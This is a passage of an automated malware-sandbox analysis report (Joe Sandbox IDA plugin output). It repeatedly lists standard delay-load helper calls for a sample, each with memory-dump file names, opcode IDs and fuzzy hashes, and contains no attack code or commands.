                                          • Part of subcall function 00BCE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00BCE8E1
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1657899915.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
                                        • Associated: 00000000.00000002.1657885702.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657928832.0000000000BE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657947584.0000000000BEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657947584.0000000000BF5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657947584.0000000000C12000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1658002305.0000000000C13000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1658002305.0000000000C1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1658002305.0000000000C58000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bb0000_Qsi7IgkrWa.jbxd
                                        Similarity
                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                        • String ID:
                                        • API String ID: 1269201914-0
                                        • Opcode ID: c54fd58aa32e2c71ea8ed06d556868f6e41b1917379ad5727f0290034f232f10
                                        • Instruction ID: 4bddcff6cf00150d0cc82681ce71b3511d8f7d29452e4e15b1accc2e224ddfa5
                                        • Opcode Fuzzy Hash: c54fd58aa32e2c71ea8ed06d556868f6e41b1917379ad5727f0290034f232f10
                                        • Instruction Fuzzy Hash: 40B012E12590C0FC364491051C03E3702CCC1C5B10330C1EEF825C6080E940DC451437
                                        APIs
                                        • ___delayLoadHelper2@8.DELAYIMP ref: 00BCE580
                                          • Part of subcall function 00BCE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00BCE8D0
                                          • Part of subcall function 00BCE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00BCE8E1
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1657899915.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
                                        • Associated: 00000000.00000002.1657885702.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657928832.0000000000BE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657947584.0000000000BEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657947584.0000000000BF5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657947584.0000000000C12000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1658002305.0000000000C13000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1658002305.0000000000C1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1658002305.0000000000C58000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bb0000_Qsi7IgkrWa.jbxd
                                        Similarity
                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                        • String ID:
                                        • API String ID: 1269201914-0
                                        • Opcode ID: 582a3b9815b9b59857cd491cea252c3c208ea76bd1bb133c0934be9771dcfb33
                                        • Instruction ID: 8507298cd47a8a8015d8076622e23e676dbdd302e8e13c702244f338f6ec3d52
                                        • Opcode Fuzzy Hash: 582a3b9815b9b59857cd491cea252c3c208ea76bd1bb133c0934be9771dcfb33
                                        • Instruction Fuzzy Hash: ABB012C2269180FC314451555C07E3B05DCC0C1B1433042AEF824C2080F8408C811535
                                        APIs
                                        • ___delayLoadHelper2@8.DELAYIMP ref: 00BCE580
                                          • Part of subcall function 00BCE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00BCE8D0
                                          • Part of subcall function 00BCE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00BCE8E1
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1657899915.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
                                        • Associated: 00000000.00000002.1657885702.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657928832.0000000000BE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657947584.0000000000BEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657947584.0000000000BF5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657947584.0000000000C12000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1658002305.0000000000C13000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1658002305.0000000000C1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1658002305.0000000000C58000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bb0000_Qsi7IgkrWa.jbxd
                                        Similarity
                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                        • String ID:
                                        • API String ID: 1269201914-0
                                        • Opcode ID: 4409164df3f25ab4c34c90cdf92dabd14645736925a446a2f99e6b7e307b3c00
                                        • Instruction ID: 4f0f1361f4114e454f55bd24947fafa5f84051387d24343560bcadbbdbaf3e6a
                                        • Opcode Fuzzy Hash: 4409164df3f25ab4c34c90cdf92dabd14645736925a446a2f99e6b7e307b3c00
                                        • Instruction Fuzzy Hash: 97B012C22A9080FC310451555D06E3B01DCC0C1B1433042AEF424D2080FC408D421535
                                        APIs
                                        • ___delayLoadHelper2@8.DELAYIMP ref: 00BCE580
                                          • Part of subcall function 00BCE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00BCE8D0
                                          • Part of subcall function 00BCE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00BCE8E1
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1657899915.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
                                        • Associated: 00000000.00000002.1657885702.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657928832.0000000000BE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657947584.0000000000BEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657947584.0000000000BF5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657947584.0000000000C12000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1658002305.0000000000C13000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1658002305.0000000000C1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1658002305.0000000000C58000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bb0000_Qsi7IgkrWa.jbxd
                                        Similarity
                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                        • String ID:
                                        • API String ID: 1269201914-0
                                        • Opcode ID: 0f9f326ea94c2d73607d25d5fbae2201a75aa9bf7501aa75e9f5b23ea039fe55
                                        • Instruction ID: 787d59e5c1eed600abed36edb5b9eea4d61fd2aa4f6a635e3b5cf598f28b4781
                                        • Opcode Fuzzy Hash: 0f9f326ea94c2d73607d25d5fbae2201a75aa9bf7501aa75e9f5b23ea039fe55
                                        • Instruction Fuzzy Hash: 6BB012C2269080FD310451551C02E7B01CCC0C1B1433040EEF824C2080F8408C511535
                                        APIs
                                        • ___delayLoadHelper2@8.DELAYIMP ref: 00BCE51F
                                          • Part of subcall function 00BCE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00BCE8D0
                                          • Part of subcall function 00BCE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00BCE8E1
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1657899915.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
                                        • Associated: 00000000.00000002.1657885702.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657928832.0000000000BE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657947584.0000000000BEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657947584.0000000000BF5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657947584.0000000000C12000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1658002305.0000000000C13000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1658002305.0000000000C1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1658002305.0000000000C58000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bb0000_Qsi7IgkrWa.jbxd
                                        Similarity
                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                        • String ID:
                                        • API String ID: 1269201914-0
                                        • Opcode ID: 87b744b4f55064f5bdcbd719861226d4d6ae12f772a49d50bf97aafed087bf3e
                                        • Instruction ID: 1def4a452fe6db26459597b27673fb3e3c67621fbfd3d7544db40fbdbba1f8af
                                        • Opcode Fuzzy Hash: 87b744b4f55064f5bdcbd719861226d4d6ae12f772a49d50bf97aafed087bf3e
                                        • Instruction Fuzzy Hash: B7B012C1659180FD310492091C02F3B05CCC0C7F1433040EEF824C1080FC408C411431
                                        APIs
                                        • ___delayLoadHelper2@8.DELAYIMP ref: 00BCE51F
                                          • Part of subcall function 00BCE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00BCE8D0
                                          • Part of subcall function 00BCE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00BCE8E1
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1657899915.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
                                        • Associated: 00000000.00000002.1657885702.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657928832.0000000000BE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657947584.0000000000BEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657947584.0000000000BF5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657947584.0000000000C12000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1658002305.0000000000C13000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1658002305.0000000000C1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1658002305.0000000000C58000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bb0000_Qsi7IgkrWa.jbxd
                                        Similarity
                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                        • String ID:
                                        • API String ID: 1269201914-0
                                        • Opcode ID: 5d4de9fc4d9e17e11bdbc7d8fa2bbeffed34db92f190808637c2731bb75abb27
                                        • Instruction ID: 97b5ef6663285b67973e9c50dda36301af4b61587bc8c3be67e8b42c79bbbc3e
                                        • Opcode Fuzzy Hash: 5d4de9fc4d9e17e11bdbc7d8fa2bbeffed34db92f190808637c2731bb75abb27
                                        • Instruction Fuzzy Hash: 11B012C16591C0FC310452091D02E3B09CCC0C7F1433080EEF824C1080FC408C421431
                                        APIs
                                        • ___delayLoadHelper2@8.DELAYIMP ref: 00BCE51F
                                          • Part of subcall function 00BCE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00BCE8D0
                                          • Part of subcall function 00BCE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00BCE8E1
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1657899915.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
                                        • Associated: 00000000.00000002.1657885702.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657928832.0000000000BE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657947584.0000000000BEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657947584.0000000000BF5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657947584.0000000000C12000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1658002305.0000000000C13000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1658002305.0000000000C1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1658002305.0000000000C58000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bb0000_Qsi7IgkrWa.jbxd
                                        Similarity
                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                        • String ID:
                                        • API String ID: 1269201914-0
                                        • Opcode ID: c48f6aa9f4137fee3e59430dff0228562e1e02e28241d382f9811ffc45a05c12
                                        • Instruction ID: d7dfe87368d2dbfd883f133a779597156ae9032b6c0afab8204419401bb85e13
                                        • Opcode Fuzzy Hash: c48f6aa9f4137fee3e59430dff0228562e1e02e28241d382f9811ffc45a05c12
                                        • Instruction Fuzzy Hash: 0BB012D1259180FC310452251C06E3B05CCC0C3F1433040BEF434C0481F8408D451431
                                        APIs
                                        • ___delayLoadHelper2@8.DELAYIMP ref: 00BCE51F
                                          • Part of subcall function 00BCE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00BCE8D0
                                          • Part of subcall function 00BCE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00BCE8E1
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1657899915.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
                                        • Associated: 00000000.00000002.1657885702.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657928832.0000000000BE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657947584.0000000000BEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657947584.0000000000BF5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657947584.0000000000C12000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1658002305.0000000000C13000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1658002305.0000000000C1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1658002305.0000000000C58000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bb0000_Qsi7IgkrWa.jbxd
                                        Similarity
                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                        • String ID:
                                        • API String ID: 1269201914-0
                                        • Opcode ID: 54c23b1849eefdf9274c5a3e442b5cdff18ab632dbf384328de203b32e903c00
                                        • Instruction ID: 2e5814d4e96c52450d3fd284bc04f263fdc86261d91ec3b2ac0ee40e32525e03
                                        • Opcode Fuzzy Hash: 54c23b1849eefdf9274c5a3e442b5cdff18ab632dbf384328de203b32e903c00
                                        • Instruction Fuzzy Hash: 8EB012C1259280FC320452095C07E3B0DCCC0C7F1433042AEF424C1080F8408D851431
                                        APIs
                                        • ___delayLoadHelper2@8.DELAYIMP ref: 00BCE1E3
                                          • Part of subcall function 00BCE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00BCE8D0
                                          • Part of subcall function 00BCE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00BCE8E1
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1657899915.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
                                        • Associated: 00000000.00000002.1657885702.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657928832.0000000000BE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657947584.0000000000BEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657947584.0000000000BF5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657947584.0000000000C12000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1658002305.0000000000C13000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1658002305.0000000000C1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1658002305.0000000000C58000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bb0000_Qsi7IgkrWa.jbxd
                                        Similarity
                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                        • String ID:
                                        • API String ID: 1269201914-0
                                        • Opcode ID: b926b58c13bafac2cc4cba901821b19a2ec0192d9db9c1928c9479216deff613
                                        • Instruction ID: 8df0dc9512d25b885b6a3f8d39d012f5b9318df69d2e4c387cafd16bf8cd0fe8
                                        • Opcode Fuzzy Hash: b926b58c13bafac2cc4cba901821b19a2ec0192d9db9c1928c9479216deff613
                                        • Instruction Fuzzy Hash: BEA011E22AA082FC300822022C03E3B02CCC0C0B2033088AEF822C0080AA80FA020830
                                        APIs
                                        • ___delayLoadHelper2@8.DELAYIMP ref: 00BCE1E3
                                          • Part of subcall function 00BCE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00BCE8D0
                                          • Part of subcall function 00BCE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00BCE8E1
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1657899915.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
                                        • Associated: 00000000.00000002.1657885702.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657928832.0000000000BE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657947584.0000000000BEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657947584.0000000000BF5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657947584.0000000000C12000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1658002305.0000000000C13000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1658002305.0000000000C1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1658002305.0000000000C58000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bb0000_Qsi7IgkrWa.jbxd
                                        Similarity
                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                        • String ID:
                                        • API String ID: 1269201914-0
                                        • Opcode ID: f8c3547dce5aaf9f3f532374e79059219347032a037964712e835960a79d0a89
                                        • Instruction ID: 8df0dc9512d25b885b6a3f8d39d012f5b9318df69d2e4c387cafd16bf8cd0fe8
                                        • Opcode Fuzzy Hash: f8c3547dce5aaf9f3f532374e79059219347032a037964712e835960a79d0a89
                                        • Instruction Fuzzy Hash: BEA011E22AA082FC300822022C03E3B02CCC0C0B2033088AEF822C0080AA80FA020830
                                        APIs
                                        • ___delayLoadHelper2@8.DELAYIMP ref: 00BCE1E3
                                          • Part of subcall function 00BCE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00BCE8D0
                                          • Part of subcall function 00BCE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00BCE8E1
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1657899915.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
                                        • Associated: 00000000.00000002.1657885702.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657928832.0000000000BE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657947584.0000000000BEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657947584.0000000000BF5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657947584.0000000000C12000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1658002305.0000000000C13000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1658002305.0000000000C1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1658002305.0000000000C58000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bb0000_Qsi7IgkrWa.jbxd
                                        Similarity
                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                        • String ID:
                                        • API String ID: 1269201914-0
                                        • Opcode ID: 0ee05eee60d3bcddb18b9b8e31010ffcca1253904c7af2f82f4cd01a8f3133ec
                                        • Instruction ID: 8df0dc9512d25b885b6a3f8d39d012f5b9318df69d2e4c387cafd16bf8cd0fe8
                                        • Opcode Fuzzy Hash: 0ee05eee60d3bcddb18b9b8e31010ffcca1253904c7af2f82f4cd01a8f3133ec
                                        • Instruction Fuzzy Hash: BEA011E22AA082FC300822022C03E3B02CCC0C0B2033088AEF822C0080AA80FA020830
                                        APIs
                                        • ___delayLoadHelper2@8.DELAYIMP ref: 00BCE1E3
                                          • Part of subcall function 00BCE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00BCE8D0
                                          • Part of subcall function 00BCE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00BCE8E1
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1657899915.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
                                        • Associated: 00000000.00000002.1657885702.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657928832.0000000000BE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657947584.0000000000BEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657947584.0000000000BF5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657947584.0000000000C12000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1658002305.0000000000C13000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1658002305.0000000000C1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1658002305.0000000000C58000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bb0000_Qsi7IgkrWa.jbxd
                                        Similarity
                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                        • String ID:
                                        • API String ID: 1269201914-0
                                        • Opcode ID: 8b33129dab8264c47fa76480b2020b2040759a66f4412a6140a204d16d108666
                                        • Instruction ID: 8df0dc9512d25b885b6a3f8d39d012f5b9318df69d2e4c387cafd16bf8cd0fe8
                                        • Opcode Fuzzy Hash: 8b33129dab8264c47fa76480b2020b2040759a66f4412a6140a204d16d108666
                                        • Instruction Fuzzy Hash: BEA011E22AA082FC300822022C03E3B02CCC0C0B2033088AEF822C0080AA80FA020830
                                        APIs
                                        • ___delayLoadHelper2@8.DELAYIMP ref: 00BCE1E3
                                          • Part of subcall function 00BCE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00BCE8D0
                                          • Part of subcall function 00BCE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00BCE8E1
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1657899915.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
                                        • Associated: 00000000.00000002.1657885702.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657928832.0000000000BE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657947584.0000000000BEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657947584.0000000000BF5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657947584.0000000000C12000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1658002305.0000000000C13000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1658002305.0000000000C1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1658002305.0000000000C58000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bb0000_Qsi7IgkrWa.jbxd
                                        Similarity
                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                        • String ID:
                                        • API String ID: 1269201914-0
                                        • Opcode ID: 031ac3f42bac112f5d7df0438b8b22421b66b2642a64bde7d21f0221f2a2ba9d
                                        • Instruction ID: 8df0dc9512d25b885b6a3f8d39d012f5b9318df69d2e4c387cafd16bf8cd0fe8
                                        • Opcode Fuzzy Hash: 031ac3f42bac112f5d7df0438b8b22421b66b2642a64bde7d21f0221f2a2ba9d
                                        • Instruction Fuzzy Hash: BEA011E22AA082FC300822022C03E3B02CCC0C0B2033088AEF822C0080AA80FA020830
                                        APIs
                                        • ___delayLoadHelper2@8.DELAYIMP ref: 00BCE1E3
                                          • Part of subcall function 00BCE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00BCE8D0
                                          • Part of subcall function 00BCE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00BCE8E1
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1657899915.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
                                        • Associated: 00000000.00000002.1657885702.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657928832.0000000000BE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657947584.0000000000BEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657947584.0000000000BF5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657947584.0000000000C12000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1658002305.0000000000C13000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1658002305.0000000000C1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1658002305.0000000000C58000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bb0000_Qsi7IgkrWa.jbxd
                                        Similarity
                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                        • String ID:
                                        • API String ID: 1269201914-0
                                        • Opcode ID: 7324971fe20523ac2b3905f2f01649dfa12b74aa9e858e44f0afeabb312d3054
                                        • Instruction ID: 8df0dc9512d25b885b6a3f8d39d012f5b9318df69d2e4c387cafd16bf8cd0fe8
                                        • Opcode Fuzzy Hash: 7324971fe20523ac2b3905f2f01649dfa12b74aa9e858e44f0afeabb312d3054
                                        • Instruction Fuzzy Hash: BEA011E22AA082FC300822022C03E3B02CCC0C0B2033088AEF822C0080AA80FA020830
                                        APIs
                                        • ___delayLoadHelper2@8.DELAYIMP ref: 00BCE1E3
                                          • Part of subcall function 00BCE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00BCE8D0
                                          • Part of subcall function 00BCE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00BCE8E1
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1657899915.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
